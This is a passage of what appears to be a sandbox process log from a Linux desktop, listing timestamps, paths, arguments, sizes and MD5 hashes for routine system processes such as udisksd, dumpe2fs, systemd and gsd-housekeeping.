                                                                                    Path:/usr/lib/udisks2/udisksd
                                                                                    Arguments:-
                                                                                    File size:483056 bytes
                                                                                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                                    Start time (UTC):14:08:52
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/usr/sbin/dumpe2fs
                                                                                    Arguments:dumpe2fs -h /dev/dm-0
                                                                                    File size:31112 bytes
                                                                                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                                                                    Start time (UTC):14:08:52
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/usr/lib/udisks2/udisksd
                                                                                    Arguments:-
                                                                                    File size:483056 bytes
                                                                                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                                    Start time (UTC):14:08:52
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/usr/sbin/dumpe2fs
                                                                                    Arguments:dumpe2fs -h /dev/dm-0
                                                                                    File size:31112 bytes
                                                                                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                                                                    Start time (UTC):14:08:53
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/usr/lib/systemd/systemd
                                                                                    Arguments:-
                                                                                    File size:1620224 bytes
                                                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                    Start time (UTC):14:08:53
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                    Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                    File size:22760 bytes
                                                                                    MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                                                    Start time (UTC):14:08:53
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/usr/libexec/gnome-session-binary
                                                                                    Arguments:-
                                                                                    File size:334664 bytes
                                                                                    MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                                    Start time (UTC):14:08:53
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/bin/sh
                                                                                    Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
                                                                                    File size:129816 bytes
                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                    Start time (UTC):14:08:53
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/usr/libexec/gsd-housekeeping
                                                                                    Arguments:/usr/libexec/gsd-housekeeping
                                                                                    File size:51840 bytes
                                                                                    MD5 hash:b55f3394a84976ddb92a2915e5d76914

                                                                                    Start time (UTC):14:08:53
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/usr/lib/udisks2/udisksd
                                                                                    Arguments:-
                                                                                    File size:483056 bytes
                                                                                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                                    Start time (UTC):14:08:53
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/usr/sbin/dumpe2fs
                                                                                    Arguments:dumpe2fs -h /dev/dm-0
                                                                                    File size:31112 bytes
                                                                                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                                                                    Start time (UTC):14:08:54
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/usr/lib/udisks2/udisksd
                                                                                    Arguments:-
                                                                                    File size:483056 bytes
                                                                                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                                    Start time (UTC):14:08:54
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/usr/sbin/dumpe2fs
                                                                                    Arguments:dumpe2fs -h /dev/dm-0
                                                                                    File size:31112 bytes
                                                                                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4